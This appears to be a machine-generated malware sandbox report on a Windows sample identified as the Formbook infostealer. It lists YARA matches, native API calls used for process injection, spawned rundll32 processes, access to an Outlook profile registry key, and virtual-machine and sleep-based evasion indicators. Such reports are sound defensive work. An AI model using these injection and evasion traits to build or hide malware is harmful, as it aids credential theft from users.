        Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: zeuhAxTIRX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E538A30_2_00E538A3
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E538990_2_00E53899
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E558230_2_00E55823
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E729E40_2_00E729E4
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E51B800_2_00E51B80
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E51B7A0_2_00E51B7A
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E555FA0_2_00E555FA
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E706A30_2_00E706A3
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E556030_2_00E55603
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E5BFE30_2_00E5BFE3
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E5BFDE0_2_00E5BFDE
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E5BF9D0_2_00E5BF9D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CD4668_2_044CD466
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441841F8_2_0441841F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D1D558_2_044D1D55
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D2D078_2_044D2D07
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04400D208_2_04400D20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D25DD8_2_044D25DD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441D5E08_2_0441D5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044325818_2_04432581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CD6168_2_044CD616
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04426E308_2_04426E30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D2EF78_2_044D2EF7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044DDFCE8_2_044DDFCE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D1FF18_2_044D1FF1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C10028_2_044C1002
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044DE8248_2_044DE824
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D28EC8_2_044D28EC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441B0908_2_0441B090
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044320A08_2_044320A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D20A88_2_044D20A8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440F9008_2_0440F900
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044241208_2_04424120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D22AE8_2_044D22AE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D2B288_2_044D2B28
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C03DA8_2_044C03DA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CDBD28_2_044CDBD2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443EBB08_2_0443EBB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A58D808_2_02A58D80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A51AC68_2_02A51AC6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A51AD08_2_02A51AD0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A5A20B8_2_02A5A20B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A5A2108_2_02A5A210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A53A508_2_02A53A50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A588808_2_02A58880
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6E8D08_2_02A6E8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A538278_2_02A53827
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A538308_2_02A53830
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A701A98_2_02A701A9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6F99A8_2_02A6F99A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A5A1CA8_2_02A5A1CA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A70C118_2_02A70C11
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6FDE48_2_02A6FDE4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0440B150 appears 39 times
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E6E5A3 NtCreateFile,0_2_00E6E5A3
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E6E6D3 NtClose,0_2_00E6E6D3
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E6E653 NtReadFile,0_2_00E6E653
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E6E783 NtAllocateVirtualMemory,0_2_00E6E783
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449540 NtReadFile,LdrInitializeThunk,8_2_04449540
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449560 NtWriteFile,LdrInitializeThunk,8_2_04449560
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044495D0 NtClose,LdrInitializeThunk,8_2_044495D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449650 NtQueryValueKey,LdrInitializeThunk,8_2_04449650
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04449660
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449610 NtEnumerateValueKey,LdrInitializeThunk,8_2_04449610
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044496D0 NtCreateKey,LdrInitializeThunk,8_2_044496D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044496E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_044496E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449710 NtQueryInformationToken,LdrInitializeThunk,8_2_04449710
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449FE0 NtCreateMutant,LdrInitializeThunk,8_2_04449FE0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449780 NtMapViewOfSection,LdrInitializeThunk,8_2_04449780
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449840 NtDelayExecution,LdrInitializeThunk,8_2_04449840
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449860 NtQuerySystemInformation,LdrInitializeThunk,8_2_04449860
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_04449910
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044499A0 NtCreateSection,LdrInitializeThunk,8_2_044499A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449A50 NtCreateFile,LdrInitializeThunk,8_2_04449A50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449520 NtWaitForSingleObject,8_2_04449520
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0444AD30 NtSetContextThread,8_2_0444AD30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044495F0 NtQueryInformationFile,8_2_044495F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449670 NtQueryInformationProcess,8_2_04449670
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449760 NtOpenProcess,8_2_04449760
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0444A770 NtOpenThread,8_2_0444A770
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449770 NtSetInformationFile,8_2_04449770
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0444A710 NtOpenProcessToken,8_2_0444A710
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449730 NtQueryVirtualMemory,8_2_04449730
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044497A0 NtUnmapViewOfSection,8_2_044497A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0444B040 NtSuspendThread,8_2_0444B040
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449820 NtEnumerateKey,8_2_04449820
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044498F0 NtReadVirtualMemory,8_2_044498F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044498A0 NtWriteVirtualMemory,8_2_044498A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449950 NtQueueApcThread,8_2_04449950
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044499D0 NtCreateProcessEx,8_2_044499D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449A00 NtProtectVirtualMemory,8_2_04449A00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449A10 NtQuerySection,8_2_04449A10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449A20 NtResumeThread,8_2_04449A20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449A80 NtOpenDirectoryObject,8_2_04449A80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449B00 NtSetValueKey,8_2_04449B00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0444A3B0 NtGetContextThread,8_2_0444A3B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C880 NtReadFile,8_2_02A6C880
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C8D0 NtDeleteFile,8_2_02A6C8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C9B0 NtAllocateVirtualMemory,8_2_02A6C9B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C900 NtClose,8_2_02A6C900
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C7D0 NtCreateFile,8_2_02A6C7D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C8FB NtClose,8_2_02A6C8FB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C8CA NtDeleteFile,8_2_02A6C8CA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C7CB NtCreateFile,8_2_02A6C7CB
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeProcess Stats: CPU usage > 98%
        Source: zeuhAxTIRX.exeStatic PE information: No import functions for PE file found
        Source: zeuhAxTIRX.exe, 00000000.00000003.526888112.0000000000D07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs zeuhAxTIRX.exe
        Source: zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000F9F000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs zeuhAxTIRX.exe
        Source: zeuhAxTIRX.exe, 00000000.00000003.525576790.0000000000B5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs zeuhAxTIRX.exe
        Source: zeuhAxTIRX.exe, 00000000.00000002.576940638.000000000112F000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs zeuhAxTIRX.exe
        Source: zeuhAxTIRX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: zeuhAxTIRX.exeStatic PE information: Section .text
        Source: zeuhAxTIRX.exeReversingLabs: Detection: 56%
        Source: zeuhAxTIRX.exeVirustotal: Detection: 54%
        Source: zeuhAxTIRX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\zeuhAxTIRX.exe C:\Users\user\Desktop\zeuhAxTIRX.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exeJump to behavior
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\j-E8-1MJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/1@13/13
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: zeuhAxTIRX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdbUGP source: zeuhAxTIRX.exe, 00000000.00000003.525576790.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000F9F000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000003.526888112.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.578096902.0000000004242000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.575803358.00000000040AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: zeuhAxTIRX.exe, 00000000.00000003.525576790.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000F9F000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000003.526888112.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.578096902.0000000004242000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.575803358.00000000040AA000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E56030 push edi; retf 0_2_00E5603F
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E5195A push cs; retf 0_2_00E51967
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E51DD0 push eax; ret 0_2_00E51DD2
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E61584 push edi; retf 0_2_00E61587
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E5EEFB pushad ; ret 0_2_00E5EEFE
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E517D0 push cs; retf C56Ch0_2_00E518FB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0445D0D1 push ecx; ret 8_2_0445D0E4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A5425D push edi; retf 8_2_02A5426C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A5D128 pushad ; ret 8_2_02A5D12B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A69F27 push ebp; ret 8_2_02A69F28
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6E5CA push esp; ret 8_2_02A6E5CB
        Source: initial sampleStatic PE information: section name: .text entropy: 7.997908848134215
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 5532Thread sleep count: 31 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 5532Thread sleep time: -62000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04446DE6 rdtsc 8_2_04446DE6
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 852Jump to behavior
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A63200 FindFirstFileW,FindNextFileW,FindClose,8_2_02A63200
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A631FA FindFirstFileW,FindNextFileW,FindClose,8_2_02A631FA
        Source: explorer.exe, 00000003.00000000.540271211.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
        Source: explorer.exe, 00000003.00000000.540271211.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
        Source: explorer.exe, 00000003.00000000.533208076.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
        Source: explorer.exe, 00000003.00000000.540271211.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000003.00000003.675302292.00000000084CC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.wg(
        Source: explorer.exe, 00000003.00000000.542257997.000000000CDEC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
